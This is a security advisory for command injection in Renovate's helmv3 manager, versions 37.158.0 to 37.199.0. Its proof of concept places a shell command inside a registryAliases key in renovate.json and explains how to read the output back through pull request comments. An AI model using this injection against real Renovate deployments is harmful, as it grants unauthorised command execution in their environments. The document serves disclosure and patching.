logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

GHSA-rqgv-292v-5qgr renovate

Package

Manager: npm
Name: renovate
Vulnerable Version: >=37.158.0 <37.199.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

Renovate vulnerable to arbitrary command injection via helmv3 manager and registryAliases ### Summary Attackers with commit access to the default branch of a repo using Renovate could manipulate helmv3 registryAliases to execute arbitrary commands. ### Details Since [#26848](https://github.com/renovatebot/renovate/pull/26848), `registryAliases` has become mergeable. This means that the helmv3 manager started honoring its value and uses a `helm repo add <key> <parameters>` command for each defined alias. See source code: https://github.com/renovatebot/renovate/blob/23f3df6216375cb5bcfe027b0faee304f877f891/lib/modules/manager/helmv3/artifacts.ts#L80 The key was not quoted, leading to the ability to use variable references (`$FOO`) in it and have them printed by Renovate on the pull request, or even running any shell commands. ### PoC Inside a repository where Renovate runs, add a Helm chart with an outdated dependency, for example: test-chart/Chart.yaml: ``` apiVersion: v2 name: redis version: 1.0.0 dependencies: - name: redis version: 18.13.10 repository: oci://registry-1.docker.io/bitnamicharts ``` test-chart/Chart.lock: ``` dependencies: - name: redis repository: oci://registry-1.docker.io/bitnamicharts version: 18.13.10 digest: sha256:11267bd32ea6c5c120ddebbb9f21e4a3c7700a961aa1a27ddb55df1fb8059a38 generated: "2024-02-16T13:31:20.807026334Z" ``` Then add the following `renovate.json`: ```json { "$schema": "https://docs.renovatebot.com/renovate-schema.json", "extends": [ "config:base" ], "registryAliases": { "foo/bar || sh -c 'ls /; exit 1' >&2": "registry.example.com/proxy" } } ``` Once Renovate runs on the repository, it will create a pull request, and add a comment titled "Artifact update problem" containing the following text: ``` File name: test-chart/Chart.lock Command failed: helm repo add foo/bar || sh -c 'ls /; exit 1' >&2 registry.example.com/proxy --force-update Error: "helm repo add" requires 2 arguments Usage: helm repo add [NAME] [URL] [flags] bin boot dev etc go home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var ``` This shows that the `ls` command executed successfully, and we can even see its output. Note that redirecting any output you want to see to stderr (`>&2`) and making sure the final command fails (`exit 1`) is required in this case, as Renovate only adds a comment if the command fails, and it contains only stderr (not stdout) output. ### Impact All Renovate versions from 37.158.0 up until 37.199.0 were affected. This vulnerability allows full access to Renovate's execution environment. The level of severity depends on how Renovate is deployed (Docker, Kubernetes, CI pipeline, ...) and whether Renovate is being offered to untrusted users/repositories.

Metadata

Created: 2024-04-23T16:21:09Z
Modified: 2024-04-23T16:21:10Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-rqgv-292v-5qgr/GHSA-rqgv-292v-5qgr.json
CWE IDs: ["CWE-78"]
Alternative ID: N/A
Finding: F004
Auto approve: 1